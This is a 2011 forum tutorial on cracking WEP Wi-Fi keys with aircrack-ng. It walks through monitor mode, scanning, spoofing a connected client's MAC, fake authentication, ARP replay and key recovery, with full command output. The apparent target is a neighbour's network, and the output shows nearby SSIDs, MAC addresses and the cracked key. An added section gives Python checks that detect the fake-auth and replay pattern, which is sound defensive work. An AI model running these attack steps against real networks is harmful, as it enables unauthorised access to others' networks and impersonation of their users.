Attacking WEP wireless networks
Posted: Sun Sep 04, 2011 12:02 am
This tutorial is intended for learning purposes only. You should use it on a network only if you have the administrator's permission. Use it at your own responsibility!
This tutorial assumes the following:
- Running on a system with a BASH interpreter (e.g. Linux)
- A wireless card that supports monitor mode and packet injection (e.g. Atheros chipset), working properly and with adequate drivers (this only matters on Windows)
- The Aircrack suite (airmon, airodump, aireplay, aircrack) installed and operational
The first thing we have to do is put our wireless card into monitor mode. This way we can capture 802.11 packets from other networks, and also inject our own custom packets.
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng start wlan0
We make sure the monitor device has been created:
$ ifconfig mon0
Now we do a first scan of what is on the air:
$ sudo airodump-ng mon0
With airodump-ng we're completely passive: we only listen to what's on the air and transmit nothing, so we're undetectable at this stage. Since we are only interested in WEP networks, we'll filter by encryption:
$ sudo airodump-ng --encrypt wep mon0
We're looking for networks with a high #Data count. WLAN_A1 looks like an excellent candidate, so we'll filter on that network (channel 9, BSSID 40:4A:03:BE:D6:A7) now:
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0
Yeah, this one seems ideal to attack. It even has an associated client (MAC E0:B9:A5:66:F7:9E), which is great because it generates data frames (not only beacons). We're going to log the IVs to a file so we can use them later to crack the WEP key (--ivs saves only the IVs, -w WLAN_A1 is the output file prefix):
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0
As we can see, the connected client is already generating a lot of data. But what if it stops doing so, or disconnects? To guard against that, we're going to impersonate this client. First of all, we fake the client's authentication, so to the AP it looks as if it never disconnected. Notice how we pass the client's MAC with the -h switch: all auth packets are sent from its MAC, so we're still hidden.
$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0
This will repeat the authentication every 10 seconds, so even if the client disconnects, the AP will still think it's connected. Now it's time to capture some of the client's ARP traffic and replay it to make the AP generate more replies. This is useful if the client disconnects (we can reuse the captured requests later) or simply to generate more data. Notice again the use of the -h switch with the client's MAC address:
$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0
We got ARP requests and we're replaying them to the AP, which re-broadcasts each one encrypted with a fresh IV. This should speed up IV gathering, as we see:
This should be enough to crack the WEP key. Let's launch aircrack-ng proper. Note the -c switch, which limits the key search to alphanumeric characters, the most likely case.
$ aircrack-ng -c WLAN_A1-01.ivs
And done!
This is the easiest case you can find, but as you can see WEP encryption is pretty useless. This network's key was cracked in around 15 mins.
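Seen from the AP or a wireless IDS, the fake-auth and ARP-replay steps above have a recognisable signature: a station that keeps sending new authentication requests while it is already associated, and a burst of hundreds of identically sized data frames per second from one station. The following is an added example, not part of the original post, implementing those two checks over a constructed event log; the thresholds and the 68-byte frame size are assumptions.

```python
"""Two WIDS-style checks for the fake-auth and ARP-replay pattern.
Added example with a constructed event log; thresholds are assumptions."""
from collections import Counter, defaultdict

STA, OTHER = "E0:B9:A5:66:F7:9E", "7C:61:93:E5:6B:5B"

# Constructed log: (seconds, kind, station MAC, frame length).
# kind is "auth", "assoc" or "data". Not a capture from the post.
EVENTS = (
    [(0.0, "auth", STA, 0), (0.1, "assoc", STA, 0)]
    # --fakeauth 10: fresh auth requests every 10 s from the same station
    + [(t, "auth", STA, 0) for t in (10.0, 20.0, 30.0, 40.0)]
    # --arpreplay: one captured 68-byte frame resent at 500 pps (size assumed)
    + [(10.2 + i / 500.0, "data", STA, 68) for i in range(600)]
    # a normal client: varied sizes at a human pace
    + [(i * 1.7, "data", OTHER, 500 + i) for i in range(20)]
)

def repeated_auth(events, min_repeats=3):
    """Stations that send new authentication requests while already
    associated. A real client re-authenticates only after a deauth,
    disassoc or roam, never every 10 s on a stable link."""
    associated, repeats = set(), Counter()
    for _, kind, sta, _ in sorted(events):
        if kind == "assoc":
            associated.add(sta)
        elif kind == "auth" and sta in associated:
            repeats[sta] += 1
    return {sta for sta, n in repeats.items() if n >= min_repeats}

def replay_flood(events, window=1.0, min_frames=100):
    """Map station -> frame size for stations that send at least
    min_frames data frames of one identical size within `window`
    seconds. Genuine traffic varies in size and rate; a replay loop
    resends the same captured frame hundreds of times per second."""
    by_sta = defaultdict(list)
    for t, kind, sta, length in events:
        if kind == "data":
            by_sta[sta].append((t, length))
    flagged = {}
    for sta, frames in by_sta.items():
        frames.sort()
        for i, (t0, size) in enumerate(frames):
            same = sum(1 for t, n in frames[i:] if t - t0 <= window and n == size)
            if same >= min_frames:
                flagged[sta] = size
                break
    return flagged
```

Both checks flag the impersonated client and leave the normal one alone; in practice you would feed them from a monitor-mode capture instead of the constructed list.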
Hope this was useful for you, see you!
The output of each command follows, in the order the commands were run above.

$ sudo airmon-ng stop wlan0

Interface       Chipset         Driver
wlan0           Unknown         rt2800pci - [phy0]
                                (monitor mode disabled)

$ sudo airmon-ng start wlan0

Interface       Chipset         Driver
wlan0           Unknown         rt2800pci - [phy0]
                                (monitor mode enabled on mon0)

$ ifconfig mon0
mon0      Link encap:UNSPEC  HWaddr EC-55-F9-B5-96-50-00-00-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1937 errors:0 dropped:1937 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:262666 (262.6 KB)  TX bytes:0 (0.0 B)

$ sudo airodump-ng mon0
CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22

BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER AUTH ESSID
64:68:0C:8D:9C:23  -33       10      1    0  11  54e   WPA   CCMP   PSK  JAZZTEL_9C22
00:1A:2B:08:06:63  -70       11      0    0   3  54    WEP   WEP         WLAN_C2
00:1A:2B:5B:D8:34  -70        8      0    0  11  54    WEP   WEP         JAZZTEL_0C
00:24:17:18:40:FB  -78        9      0    0  11  54    WPA   TKIP   PSK  ORANGE-FB32FA
E8:39:DF:CF:D1:7E  -85        2      0    0   3  54e   WPA2  CCMP   PSK  Jazztel_A3
40:4A:03:9E:E4:D0  -83        6      0    0   4  54 .  WEP   WEP         WLAN_25
00:21:63:6B:DA:58  -84        7      0    0  11  54e   WPA   TKIP   PSK  VodafoneDA57
40:4A:03:BE:D6:A7  -84        7     58    0   9  54 .  WEP   WEP         WLAN_A1
00:1A:2B:13:98:1C  -83        9      0    0   3  54    WEP   WEP         WLAN_D7
E8:39:DF:CF:D1:7D  -84        5      0    0   3  54e   WPA2  CCMP   PSK  Jazztel
00:1D:6A:6C:F4:C3  -85        5      0    0   6  54e.  WPA2  CCMP   PSK  Orange-80f4
62:C7:14:33:18:5C  -86        6      0    0   7  54e   WPA   CCMP   PSK  vodafoneenrique01
88:25:2C:71:90:98  -86        8      0    0   6  54e.  WEP   WEP         nuria
00:13:49:89:27:7C  -87        8      0    0   9  54 .  WEP   WEP         WLAN_91
00:1A:2B:4A:6E:0E  -88        8      0    0  11  54    WEP   WEP         adsuar
00:22:2D:3E:8D:48  -89        8      0    0  11  54e.  WEP   WEP         lucy_david
E0:91:53:49:70:DA  -90        9      1    0  10  54 .  WEP   WEP         WLAN_78
00:23:08:E3:C5:34  -90        3      4    0   9  54e.  WEP   WEP         WLAN3C5903
5C:33:8E:E0:63:3A  -90        5      0    0   6  54e.  WPA2  CCMP   PSK  Reaviles_Madrid
50:67:F0:88:20:9C  -92        5      0    0   7  54 .  WEP   WEP         WLAN_0B
00:1A:2B:08:E4:BB  -93        0      0    0  11  54    WEP   WEP         galapagos

BSSID              STATION            PWR  Rate    Lost  Packets  Probes
(not associated)   40:28:49:55:A8:C2    0  0 - 1      0       11
64:68:0C:8D:9C:23  7C:61:93:E5:6B:5B  -40  0 - 5e     0        1
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70  0 -54    238       61  WLAN_A1

$ sudo airodump-ng --encrypt wep mon0
CH 10 ][ BAT: 2 hours 2 mins ][ Elapsed: 24 s ][ 2011-09-04 01:23

BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC  CIPHER AUTH ESSID
00:1A:2B:5B:D8:34  -70       18      0    0  11  54    WEP  WEP         JAZZTEL_0C
00:1A:2B:08:06:63  -70       19      0    0   3  54    WEP  WEP         WLAN_C2
00:1A:2B:13:98:1C  -82       19      0    0   3  54    WEP  WEP         WLAN_D7
40:4A:03:9E:E4:D0  -84       17      0    0   4  54 .  WEP  WEP         WLAN_25
40:4A:03:BE:D6:A7  -84       16    182    0   9  54 .  WEP  WEP         WLAN_A1
00:13:49:89:27:7C  -87       13      0    0   9  54 .  WEP  WEP         WLAN_91
88:25:2C:71:90:98  -87       15      0    0   6  54e.  WEP  WEP         nuria
00:22:2D:3E:8D:48  -87       10      0    0  11  54e.  WEP  WEP         lucy_david
00:1A:2B:4A:6E:0E  -88       11      0    0  11  54    WEP  WEP         adsuar
00:23:08:E3:C5:34  -89        4      0    0   9  54e.  WEP  WEP         WLAN3C5903
E0:91:53:49:70:DA  -90        7      0    0  10  54 .  WEP  WEP         WLAN_78
64:68:0C:6C:9C:11  -92        2      0    0   6  54    WEP  WEP         Wireless Jazztel
50:67:F0:88:20:9C  -92        4      0    0   7  54 .  WEP  WEP         WLAN_0B
00:1A:2B:08:E4:BB  -93        6      0    0  11  54    WEP  WEP         galapagos
00:60:4C:98:61:89  -95        2      0    0   6  54 .  WEP  WEP         adsl4917

BSSID              STATION            PWR  Rate    Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -72  0 -54    240      181

$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0
CH 9 ][ BAT: 2 hours 3 mins ][ Elapsed: 8 s ][ 2011-09-04 01:27

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB    ENC  CIPHER AUTH ESSID
40:4A:03:BE:D6:A7  -88    6       74    475   44   9  54 .  WEP  WEP         WLAN_A1

BSSID              STATION            PWR  Rate    Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70  0 -54     99      473

$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0
CH 9 ][ BAT: 1 hour 57 mins ][ Elapsed: 8 s ][ 2011-09-04 01:30

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB    ENC  CIPHER AUTH ESSID
40:4A:03:BE:D6:A7  -88    7       91    519   47   9  54 .  WEP  WEP         WLAN_A1

BSSID              STATION            PWR  Rate    Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70  0 -54     74      519

$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:33:27  Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
01:33:27  Sending Authentication Request (Open System)
01:33:27  Authentication successful
01:33:27  Sending Association Request
01:33:27  Association successful :-) (AID: 1)
[ACK]

$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:36:45  Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
Saving ARP requests in replay_arp-0904-013645.cap
You should also start airodump-ng to capture replies.
Read 5291 packets (got 1485 ARP requests and 229 ACKs), sent 2742 packets...(500 pps)

The airodump-ng capture during the ARP replay:

CH 9 ][ BAT: 1 hour 9 mins ][ Elapsed: 8 mins ][ 2011-09-04 01:38

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB    ENC  CIPHER AUTH ESSID
40:4A:03:BE:D6:A7  -84   45     4072  34576  361   9  54 .  WEP  WEP    OPN  WLAN_A1

BSSID              STATION            PWR  Rate    Lost  Packets  Probes
40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E    0  24 - 1  8121    81946  WLAN_A1

$ aircrack-ng -c WLAN_A1-01.ivs
Opening WLAN_A1-01.ivs
Read 51527 packets.

   #  BSSID              ESSID    Encryption
   1  40:4A:03:BE:D6:A7  WLAN_A1  WEP (51526 IVs)

Choosing first network as target.
Opening WLAN_A1-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 51738 ivs.

                        Aircrack-ng 1.1 r1904

            [00:00:00] Tested 37 keys (got 30056 IVs)

   KB    depth   byte(vote)
    0    0/  2   5A(42752) 7D(36608) 9E(36608) E6(36608) ED(36352) 64(36096) 7F(36096) 0B(35840) 3F(35584) 89(35584) 66(35072) 6D(35072) 2F(34816)
    1    7/  8   6B(36352) 62(35584) 03(35328) 29(35328) 70(35072) 7A(34816) A2(34816) A7(34816) 0D(34560) 32(34560) 8C(34560) 1E(34304) CA(34304)
    2    3/  2   8D(36096) 33(35840) 90(35840) 1C(35072) 2D(35072) BB(35072) FF(35072) 0C(34816) 53(34816) D0(34816) 9C(34560) AB(34560) 23(34304)
    3    4/  3   C0(36864) A2(35840) AF(35840) 30(35584) 36(35584) 31(35328) 79(35072) 2A(34816) 2D(34560) 55(34560) 14(34304) 4F(34304) FA(34304)
    4    0/  2   33(45568) 69(39680) E3(36096) 0E(35328) 13(35328) 23(35328) 80(35328) B4(35328) E4(35328) 92(35072) 9C(35072) 0F(34816) 87(34816)

KEY FOUND! [ 5A:34:30:34:41:30:33:43:35:30:45:41:31 ] (ASCII: Z404A03C50EA1 )
Decrypted correctly: 100%